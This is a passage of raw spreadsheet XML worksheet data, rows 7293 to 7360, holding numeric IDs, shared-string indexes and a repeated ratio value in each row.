      <c r="A7293" s="1">
        <v>10625.0</v>
      </c>
      <c r="B7293" s="2">
        <v>1.3846653E7</v>
      </c>
      <c r="C7293" s="2" t="s">
        <v>6917</v>
      </c>
      <c r="D7293" s="2">
        <v>1.0</v>
      </c>
      <c r="E7293" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7293" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7294" ht="15.75" customHeight="1">
      <c r="A7294" s="1">
        <v>10640.0</v>
      </c>
      <c r="B7294" s="2">
        <v>1.4119532E7</v>
      </c>
      <c r="C7294" s="2" t="s">
        <v>6918</v>
      </c>
      <c r="D7294" s="2">
        <v>1.0</v>
      </c>
      <c r="E7294" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7294" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7295" ht="15.75" customHeight="1">
      <c r="A7295" s="1">
        <v>11225.0</v>
      </c>
      <c r="B7295" s="2">
        <v>2.0314115E7</v>
      </c>
      <c r="C7295" s="2" t="s">
        <v>6919</v>
      </c>
      <c r="D7295" s="2">
        <v>1.0</v>
      </c>
      <c r="E7295" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7295" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7296" ht="15.75" customHeight="1">
      <c r="A7296" s="1">
        <v>11890.0</v>
      </c>
      <c r="B7296" s="2">
        <v>2.5099495E7</v>
      </c>
      <c r="C7296" s="2" t="s">
        <v>6920</v>
      </c>
      <c r="D7296" s="2">
        <v>1.0</v>
      </c>
      <c r="E7296" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7296" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7297" ht="15.75" customHeight="1">
      <c r="A7297" s="1">
        <v>11938.0</v>
      </c>
      <c r="B7297" s="2">
        <v>2.55007E7</v>
      </c>
      <c r="C7297" s="2" t="s">
        <v>6921</v>
      </c>
      <c r="D7297" s="2">
        <v>1.0</v>
      </c>
      <c r="E7297" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7297" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7298" ht="15.75" customHeight="1">
      <c r="A7298" s="1">
        <v>12035.0</v>
      </c>
      <c r="B7298" s="2">
        <v>2.6281243E7</v>
      </c>
      <c r="C7298" s="2" t="s">
        <v>6922</v>
      </c>
      <c r="D7298" s="2">
        <v>1.0</v>
      </c>
      <c r="E7298" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7298" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7299" ht="15.75" customHeight="1">
      <c r="A7299" s="1">
        <v>13643.0</v>
      </c>
      <c r="B7299" s="2">
        <v>3.5912905E7</v>
      </c>
      <c r="C7299" s="2" t="s">
        <v>6923</v>
      </c>
      <c r="D7299" s="2">
        <v>1.0</v>
      </c>
      <c r="E7299" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7299" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7300" ht="15.75" customHeight="1">
      <c r="A7300" s="1">
        <v>13884.0</v>
      </c>
      <c r="B7300" s="2">
        <v>3.7011214E7</v>
      </c>
      <c r="C7300" s="2" t="s">
        <v>6924</v>
      </c>
      <c r="D7300" s="2">
        <v>1.0</v>
      </c>
      <c r="E7300" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7300" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7301" ht="15.75" customHeight="1">
      <c r="A7301" s="1">
        <v>14881.0</v>
      </c>
      <c r="B7301" s="2">
        <v>4.1104718E7</v>
      </c>
      <c r="C7301" s="2" t="s">
        <v>6925</v>
      </c>
      <c r="D7301" s="2">
        <v>1.0</v>
      </c>
      <c r="E7301" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7301" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7302" ht="15.75" customHeight="1">
      <c r="A7302" s="1">
        <v>16262.0</v>
      </c>
      <c r="B7302" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C7302" s="2" t="s">
        <v>6926</v>
      </c>
      <c r="D7302" s="2">
        <v>1.0</v>
      </c>
      <c r="E7302" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7302" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7303" ht="15.75" customHeight="1">
      <c r="A7303" s="1">
        <v>16270.0</v>
      </c>
      <c r="B7303" s="2">
        <v>4.5780537E7</v>
      </c>
      <c r="C7303" s="2" t="s">
        <v>6927</v>
      </c>
      <c r="D7303" s="2">
        <v>1.0</v>
      </c>
      <c r="E7303" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7303" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7304" ht="15.75" customHeight="1">
      <c r="A7304" s="1">
        <v>16289.0</v>
      </c>
      <c r="B7304" s="2">
        <v>4.5829346E7</v>
      </c>
      <c r="C7304" s="2" t="s">
        <v>6928</v>
      </c>
      <c r="D7304" s="2">
        <v>1.0</v>
      </c>
      <c r="E7304" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7304" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7305" ht="15.75" customHeight="1">
      <c r="A7305" s="1">
        <v>16612.0</v>
      </c>
      <c r="B7305" s="2">
        <v>4.7058091E7</v>
      </c>
      <c r="C7305" s="2" t="s">
        <v>6929</v>
      </c>
      <c r="D7305" s="2">
        <v>1.0</v>
      </c>
      <c r="E7305" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7305" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7306" ht="15.75" customHeight="1">
      <c r="A7306" s="1">
        <v>17151.0</v>
      </c>
      <c r="B7306" s="2">
        <v>4.8854938E7</v>
      </c>
      <c r="C7306" s="2" t="s">
        <v>6930</v>
      </c>
      <c r="D7306" s="2">
        <v>1.0</v>
      </c>
      <c r="E7306" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7306" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7307" ht="15.75" customHeight="1">
      <c r="A7307" s="1">
        <v>17310.0</v>
      </c>
      <c r="B7307" s="2">
        <v>4.9314818E7</v>
      </c>
      <c r="C7307" s="2" t="s">
        <v>6931</v>
      </c>
      <c r="D7307" s="2">
        <v>1.0</v>
      </c>
      <c r="E7307" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7307" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7308" ht="15.75" customHeight="1">
      <c r="A7308" s="1">
        <v>17867.0</v>
      </c>
      <c r="B7308" s="2">
        <v>5.1021774E7</v>
      </c>
      <c r="C7308" s="2" t="s">
        <v>6932</v>
      </c>
      <c r="D7308" s="2">
        <v>1.0</v>
      </c>
      <c r="E7308" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7308" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7309" ht="15.75" customHeight="1">
      <c r="A7309" s="1">
        <v>18253.0</v>
      </c>
      <c r="B7309" s="2">
        <v>5.216721E7</v>
      </c>
      <c r="C7309" s="2" t="s">
        <v>6933</v>
      </c>
      <c r="D7309" s="2">
        <v>1.0</v>
      </c>
      <c r="E7309" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7309" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7310" ht="15.75" customHeight="1">
      <c r="A7310" s="1">
        <v>18334.0</v>
      </c>
      <c r="B7310" s="2">
        <v>5.2414697E7</v>
      </c>
      <c r="C7310" s="2" t="s">
        <v>6934</v>
      </c>
      <c r="D7310" s="2">
        <v>1.0</v>
      </c>
      <c r="E7310" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7310" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7311" ht="15.75" customHeight="1">
      <c r="A7311" s="1">
        <v>20120.0</v>
      </c>
      <c r="B7311" s="2">
        <v>6109799.0</v>
      </c>
      <c r="C7311" s="2" t="s">
        <v>6935</v>
      </c>
      <c r="D7311" s="2">
        <v>1.0</v>
      </c>
      <c r="E7311" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7311" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7312" ht="15.75" customHeight="1">
      <c r="A7312" s="1">
        <v>20879.0</v>
      </c>
      <c r="B7312" s="2">
        <v>1.6045484E7</v>
      </c>
      <c r="C7312" s="2" t="s">
        <v>6936</v>
      </c>
      <c r="D7312" s="2">
        <v>1.0</v>
      </c>
      <c r="E7312" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7312" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7313" ht="15.75" customHeight="1">
      <c r="A7313" s="1">
        <v>21053.0</v>
      </c>
      <c r="B7313" s="2">
        <v>1.7758841E7</v>
      </c>
      <c r="C7313" s="2" t="s">
        <v>6937</v>
      </c>
      <c r="D7313" s="2">
        <v>1.0</v>
      </c>
      <c r="E7313" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7313" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7314" ht="15.75" customHeight="1">
      <c r="A7314" s="1">
        <v>21327.0</v>
      </c>
      <c r="B7314" s="2">
        <v>2.100481E7</v>
      </c>
      <c r="C7314" s="2" t="s">
        <v>6938</v>
      </c>
      <c r="D7314" s="2">
        <v>1.0</v>
      </c>
      <c r="E7314" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7314" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7315" ht="15.75" customHeight="1">
      <c r="A7315" s="1">
        <v>21393.0</v>
      </c>
      <c r="B7315" s="2">
        <v>2.1801236E7</v>
      </c>
      <c r="C7315" s="2" t="s">
        <v>6939</v>
      </c>
      <c r="D7315" s="2">
        <v>1.0</v>
      </c>
      <c r="E7315" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7315" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7316" ht="15.75" customHeight="1">
      <c r="A7316" s="1">
        <v>21423.0</v>
      </c>
      <c r="B7316" s="2">
        <v>2.2093219E7</v>
      </c>
      <c r="C7316" s="2" t="s">
        <v>6940</v>
      </c>
      <c r="D7316" s="2">
        <v>1.0</v>
      </c>
      <c r="E7316" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7316" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7317" ht="15.75" customHeight="1">
      <c r="A7317" s="1">
        <v>21459.0</v>
      </c>
      <c r="B7317" s="2">
        <v>2.2694332E7</v>
      </c>
      <c r="C7317" s="2" t="s">
        <v>6941</v>
      </c>
      <c r="D7317" s="2">
        <v>1.0</v>
      </c>
      <c r="E7317" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7317" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7318" ht="15.75" customHeight="1">
      <c r="A7318" s="1">
        <v>21487.0</v>
      </c>
      <c r="B7318" s="2">
        <v>2.3051054E7</v>
      </c>
      <c r="C7318" s="2" t="s">
        <v>6942</v>
      </c>
      <c r="D7318" s="2">
        <v>1.0</v>
      </c>
      <c r="E7318" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7318" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7319" ht="15.75" customHeight="1">
      <c r="A7319" s="1">
        <v>21746.0</v>
      </c>
      <c r="B7319" s="2">
        <v>2.6021069E7</v>
      </c>
      <c r="C7319" s="2" t="s">
        <v>6943</v>
      </c>
      <c r="D7319" s="2">
        <v>1.0</v>
      </c>
      <c r="E7319" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7319" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7320" ht="15.75" customHeight="1">
      <c r="A7320" s="1">
        <v>21780.0</v>
      </c>
      <c r="B7320" s="2">
        <v>2.6464821E7</v>
      </c>
      <c r="C7320" s="2" t="s">
        <v>6944</v>
      </c>
      <c r="D7320" s="2">
        <v>1.0</v>
      </c>
      <c r="E7320" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7320" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7321" ht="15.75" customHeight="1">
      <c r="A7321" s="1">
        <v>21832.0</v>
      </c>
      <c r="B7321" s="2">
        <v>2.6998835E7</v>
      </c>
      <c r="C7321" s="2" t="s">
        <v>6945</v>
      </c>
      <c r="D7321" s="2">
        <v>1.0</v>
      </c>
      <c r="E7321" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7321" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7322" ht="15.75" customHeight="1">
      <c r="A7322" s="1">
        <v>21995.0</v>
      </c>
      <c r="B7322" s="2">
        <v>2.9526514E7</v>
      </c>
      <c r="C7322" s="2" t="s">
        <v>6946</v>
      </c>
      <c r="D7322" s="2">
        <v>1.0</v>
      </c>
      <c r="E7322" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7322" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7323" ht="15.75" customHeight="1">
      <c r="A7323" s="1">
        <v>22027.0</v>
      </c>
      <c r="B7323" s="2">
        <v>3.0125368E7</v>
      </c>
      <c r="C7323" s="2" t="s">
        <v>6947</v>
      </c>
      <c r="D7323" s="2">
        <v>1.0</v>
      </c>
      <c r="E7323" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7323" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7324" ht="15.75" customHeight="1">
      <c r="A7324" s="1">
        <v>22044.0</v>
      </c>
      <c r="B7324" s="2">
        <v>3.0235338E7</v>
      </c>
      <c r="C7324" s="2" t="s">
        <v>6948</v>
      </c>
      <c r="D7324" s="2">
        <v>1.0</v>
      </c>
      <c r="E7324" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7324" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7325" ht="15.75" customHeight="1">
      <c r="A7325" s="1">
        <v>22134.0</v>
      </c>
      <c r="B7325" s="2">
        <v>3.1098741E7</v>
      </c>
      <c r="C7325" s="2" t="s">
        <v>6949</v>
      </c>
      <c r="D7325" s="2">
        <v>1.0</v>
      </c>
      <c r="E7325" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7325" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7326" ht="15.75" customHeight="1">
      <c r="A7326" s="1">
        <v>22759.0</v>
      </c>
      <c r="B7326" s="2">
        <v>4.468085E7</v>
      </c>
      <c r="C7326" s="2" t="s">
        <v>6950</v>
      </c>
      <c r="D7326" s="2">
        <v>1.0</v>
      </c>
      <c r="E7326" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7326" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7327" ht="15.75" customHeight="1">
      <c r="A7327" s="1">
        <v>22811.0</v>
      </c>
      <c r="B7327" s="2">
        <v>4.6069279E7</v>
      </c>
      <c r="C7327" s="2" t="s">
        <v>6951</v>
      </c>
      <c r="D7327" s="2">
        <v>1.0</v>
      </c>
      <c r="E7327" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7327" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7328" ht="15.75" customHeight="1">
      <c r="A7328" s="1">
        <v>22837.0</v>
      </c>
      <c r="B7328" s="2">
        <v>4.6571999E7</v>
      </c>
      <c r="C7328" s="2" t="s">
        <v>6952</v>
      </c>
      <c r="D7328" s="2">
        <v>1.0</v>
      </c>
      <c r="E7328" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7328" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7329" ht="15.75" customHeight="1">
      <c r="A7329" s="1">
        <v>23060.0</v>
      </c>
      <c r="B7329" s="2">
        <v>5.0334001E7</v>
      </c>
      <c r="C7329" s="2" t="s">
        <v>6953</v>
      </c>
      <c r="D7329" s="2">
        <v>1.0</v>
      </c>
      <c r="E7329" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7329" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7330" ht="15.75" customHeight="1">
      <c r="A7330" s="1">
        <v>23173.0</v>
      </c>
      <c r="B7330" s="2">
        <v>5.2136694E7</v>
      </c>
      <c r="C7330" s="2" t="s">
        <v>6954</v>
      </c>
      <c r="D7330" s="2">
        <v>1.0</v>
      </c>
      <c r="E7330" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7330" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7331" ht="15.75" customHeight="1">
      <c r="A7331" s="1">
        <v>23388.0</v>
      </c>
      <c r="B7331" s="2">
        <v>5.5647633E7</v>
      </c>
      <c r="C7331" s="2" t="s">
        <v>6955</v>
      </c>
      <c r="D7331" s="2">
        <v>1.0</v>
      </c>
      <c r="E7331" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7331" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7332" ht="15.75" customHeight="1">
      <c r="A7332" s="1">
        <v>23640.0</v>
      </c>
      <c r="B7332" s="2">
        <v>6669465.0</v>
      </c>
      <c r="C7332" s="2" t="s">
        <v>6956</v>
      </c>
      <c r="D7332" s="2">
        <v>1.0</v>
      </c>
      <c r="E7332" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7332" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7333" ht="15.75" customHeight="1">
      <c r="A7333" s="1">
        <v>23678.0</v>
      </c>
      <c r="B7333" s="2">
        <v>6952342.0</v>
      </c>
      <c r="C7333" s="2" t="s">
        <v>6957</v>
      </c>
      <c r="D7333" s="2">
        <v>1.0</v>
      </c>
      <c r="E7333" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7333" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7334" ht="15.75" customHeight="1">
      <c r="A7334" s="1">
        <v>23974.0</v>
      </c>
      <c r="B7334" s="2">
        <v>9072521.0</v>
      </c>
      <c r="C7334" s="2" t="s">
        <v>6958</v>
      </c>
      <c r="D7334" s="2">
        <v>1.0</v>
      </c>
      <c r="E7334" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7334" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7335" ht="15.75" customHeight="1">
      <c r="A7335" s="1">
        <v>24385.0</v>
      </c>
      <c r="B7335" s="2">
        <v>1.078187E7</v>
      </c>
      <c r="C7335" s="2" t="s">
        <v>6959</v>
      </c>
      <c r="D7335" s="2">
        <v>1.0</v>
      </c>
      <c r="E7335" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7335" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7336" ht="15.75" customHeight="1">
      <c r="A7336" s="1">
        <v>24472.0</v>
      </c>
      <c r="B7336" s="2">
        <v>1.1008441E7</v>
      </c>
      <c r="C7336" s="2" t="s">
        <v>6960</v>
      </c>
      <c r="D7336" s="2">
        <v>1.0</v>
      </c>
      <c r="E7336" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7336" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7337" ht="15.75" customHeight="1">
      <c r="A7337" s="1">
        <v>24906.0</v>
      </c>
      <c r="B7337" s="2">
        <v>1.2310392E7</v>
      </c>
      <c r="C7337" s="2" t="s">
        <v>6961</v>
      </c>
      <c r="D7337" s="2">
        <v>1.0</v>
      </c>
      <c r="E7337" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7337" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7338" ht="15.75" customHeight="1">
      <c r="A7338" s="1">
        <v>25184.0</v>
      </c>
      <c r="B7338" s="2">
        <v>1.3131941E7</v>
      </c>
      <c r="C7338" s="2" t="s">
        <v>6962</v>
      </c>
      <c r="D7338" s="2">
        <v>1.0</v>
      </c>
      <c r="E7338" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7338" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7339" ht="15.75" customHeight="1">
      <c r="A7339" s="1">
        <v>25214.0</v>
      </c>
      <c r="B7339" s="2">
        <v>1.3247834E7</v>
      </c>
      <c r="C7339" s="2" t="s">
        <v>6963</v>
      </c>
      <c r="D7339" s="2">
        <v>1.0</v>
      </c>
      <c r="E7339" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7339" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7340" ht="15.75" customHeight="1">
      <c r="A7340" s="1">
        <v>25520.0</v>
      </c>
      <c r="B7340" s="2">
        <v>1.4209576E7</v>
      </c>
      <c r="C7340" s="2" t="s">
        <v>6964</v>
      </c>
      <c r="D7340" s="2">
        <v>1.0</v>
      </c>
      <c r="E7340" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7340" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7341" ht="15.75" customHeight="1">
      <c r="A7341" s="1">
        <v>25754.0</v>
      </c>
      <c r="B7341" s="2">
        <v>1.4600596E7</v>
      </c>
      <c r="C7341" s="2" t="s">
        <v>6965</v>
      </c>
      <c r="D7341" s="2">
        <v>1.0</v>
      </c>
      <c r="E7341" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7341" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7342" ht="15.75" customHeight="1">
      <c r="A7342" s="1">
        <v>26123.0</v>
      </c>
      <c r="B7342" s="2">
        <v>1.5912121E7</v>
      </c>
      <c r="C7342" s="2" t="s">
        <v>6966</v>
      </c>
      <c r="D7342" s="2">
        <v>1.0</v>
      </c>
      <c r="E7342" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7342" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7343" ht="15.75" customHeight="1">
      <c r="A7343" s="1">
        <v>26300.0</v>
      </c>
      <c r="B7343" s="2">
        <v>1.6562911E7</v>
      </c>
      <c r="C7343" s="2" t="s">
        <v>6967</v>
      </c>
      <c r="D7343" s="2">
        <v>1.0</v>
      </c>
      <c r="E7343" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7343" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7344" ht="15.75" customHeight="1">
      <c r="A7344" s="1">
        <v>26636.0</v>
      </c>
      <c r="B7344" s="2">
        <v>1.8043994E7</v>
      </c>
      <c r="C7344" s="2" t="s">
        <v>6968</v>
      </c>
      <c r="D7344" s="2">
        <v>1.0</v>
      </c>
      <c r="E7344" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7344" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7345" ht="15.75" customHeight="1">
      <c r="A7345" s="1">
        <v>27032.0</v>
      </c>
      <c r="B7345" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C7345" s="2" t="s">
        <v>6969</v>
      </c>
      <c r="D7345" s="2">
        <v>1.0</v>
      </c>
      <c r="E7345" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7345" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7346" ht="15.75" customHeight="1">
      <c r="A7346" s="1">
        <v>27083.0</v>
      </c>
      <c r="B7346" s="2">
        <v>2.0483762E7</v>
      </c>
      <c r="C7346" s="2" t="s">
        <v>6970</v>
      </c>
      <c r="D7346" s="2">
        <v>1.0</v>
      </c>
      <c r="E7346" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7346" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7347" ht="15.75" customHeight="1">
      <c r="A7347" s="1">
        <v>27397.0</v>
      </c>
      <c r="B7347" s="2">
        <v>2.1801235E7</v>
      </c>
      <c r="C7347" s="2" t="s">
        <v>6971</v>
      </c>
      <c r="D7347" s="2">
        <v>1.0</v>
      </c>
      <c r="E7347" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7347" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7348" ht="15.75" customHeight="1">
      <c r="A7348" s="1">
        <v>27592.0</v>
      </c>
      <c r="B7348" s="2">
        <v>2.25603E7</v>
      </c>
      <c r="C7348" s="2" t="s">
        <v>6972</v>
      </c>
      <c r="D7348" s="2">
        <v>1.0</v>
      </c>
      <c r="E7348" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7348" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7349" ht="15.75" customHeight="1">
      <c r="A7349" s="1">
        <v>28236.0</v>
      </c>
      <c r="B7349" s="2">
        <v>2.5206465E7</v>
      </c>
      <c r="C7349" s="2" t="s">
        <v>6973</v>
      </c>
      <c r="D7349" s="2">
        <v>1.0</v>
      </c>
      <c r="E7349" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7349" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7350" ht="15.75" customHeight="1">
      <c r="A7350" s="1">
        <v>28312.0</v>
      </c>
      <c r="B7350" s="2">
        <v>2.5692427E7</v>
      </c>
      <c r="C7350" s="2" t="s">
        <v>6974</v>
      </c>
      <c r="D7350" s="2">
        <v>1.0</v>
      </c>
      <c r="E7350" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7350" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7351" ht="15.75" customHeight="1">
      <c r="A7351" s="1">
        <v>28433.0</v>
      </c>
      <c r="B7351" s="2">
        <v>2.6469778E7</v>
      </c>
      <c r="C7351" s="2" t="s">
        <v>6975</v>
      </c>
      <c r="D7351" s="2">
        <v>1.0</v>
      </c>
      <c r="E7351" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7351" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7352" ht="15.75" customHeight="1">
      <c r="A7352" s="1">
        <v>28500.0</v>
      </c>
      <c r="B7352" s="2">
        <v>2.6703041E7</v>
      </c>
      <c r="C7352" s="2" t="s">
        <v>6976</v>
      </c>
      <c r="D7352" s="2">
        <v>1.0</v>
      </c>
      <c r="E7352" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7352" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7353" ht="15.75" customHeight="1">
      <c r="A7353" s="1">
        <v>29652.0</v>
      </c>
      <c r="B7353" s="2">
        <v>3.3874679E7</v>
      </c>
      <c r="C7353" s="2" t="s">
        <v>6977</v>
      </c>
      <c r="D7353" s="2">
        <v>1.0</v>
      </c>
      <c r="E7353" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7353" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7354" ht="15.75" customHeight="1">
      <c r="A7354" s="1">
        <v>30090.0</v>
      </c>
      <c r="B7354" s="2">
        <v>3.6352799E7</v>
      </c>
      <c r="C7354" s="2" t="s">
        <v>6978</v>
      </c>
      <c r="D7354" s="2">
        <v>1.0</v>
      </c>
      <c r="E7354" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7354" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7355" ht="15.75" customHeight="1">
      <c r="A7355" s="1">
        <v>30115.0</v>
      </c>
      <c r="B7355" s="2">
        <v>3.681415E7</v>
      </c>
      <c r="C7355" s="2" t="s">
        <v>6979</v>
      </c>
      <c r="D7355" s="2">
        <v>1.0</v>
      </c>
      <c r="E7355" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7355" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7356" ht="15.75" customHeight="1">
      <c r="A7356" s="1">
        <v>30210.0</v>
      </c>
      <c r="B7356" s="2">
        <v>3.7380163E7</v>
      </c>
      <c r="C7356" s="2" t="s">
        <v>6980</v>
      </c>
      <c r="D7356" s="2">
        <v>1.0</v>
      </c>
      <c r="E7356" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7356" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7357" ht="15.75" customHeight="1">
      <c r="A7357" s="1">
        <v>30314.0</v>
      </c>
      <c r="B7357" s="2">
        <v>3.8011399E7</v>
      </c>
      <c r="C7357" s="2" t="s">
        <v>6981</v>
      </c>
      <c r="D7357" s="2">
        <v>1.0</v>
      </c>
      <c r="E7357" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7357" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7358" ht="15.75" customHeight="1">
      <c r="A7358" s="1">
        <v>30776.0</v>
      </c>
      <c r="B7358" s="2">
        <v>4.4680849E7</v>
      </c>
      <c r="C7358" s="2" t="s">
        <v>6950</v>
      </c>
      <c r="D7358" s="2">
        <v>1.0</v>
      </c>
      <c r="E7358" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7358" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7359" ht="15.75" customHeight="1">
      <c r="A7359" s="1">
        <v>31031.0</v>
      </c>
      <c r="B7359" s="2">
        <v>4.7806661E7</v>
      </c>
      <c r="C7359" s="2" t="s">
        <v>6982</v>
      </c>
      <c r="D7359" s="2">
        <v>1.0</v>
      </c>
      <c r="E7359" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7359" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7360" ht="15.75" customHeight="1">
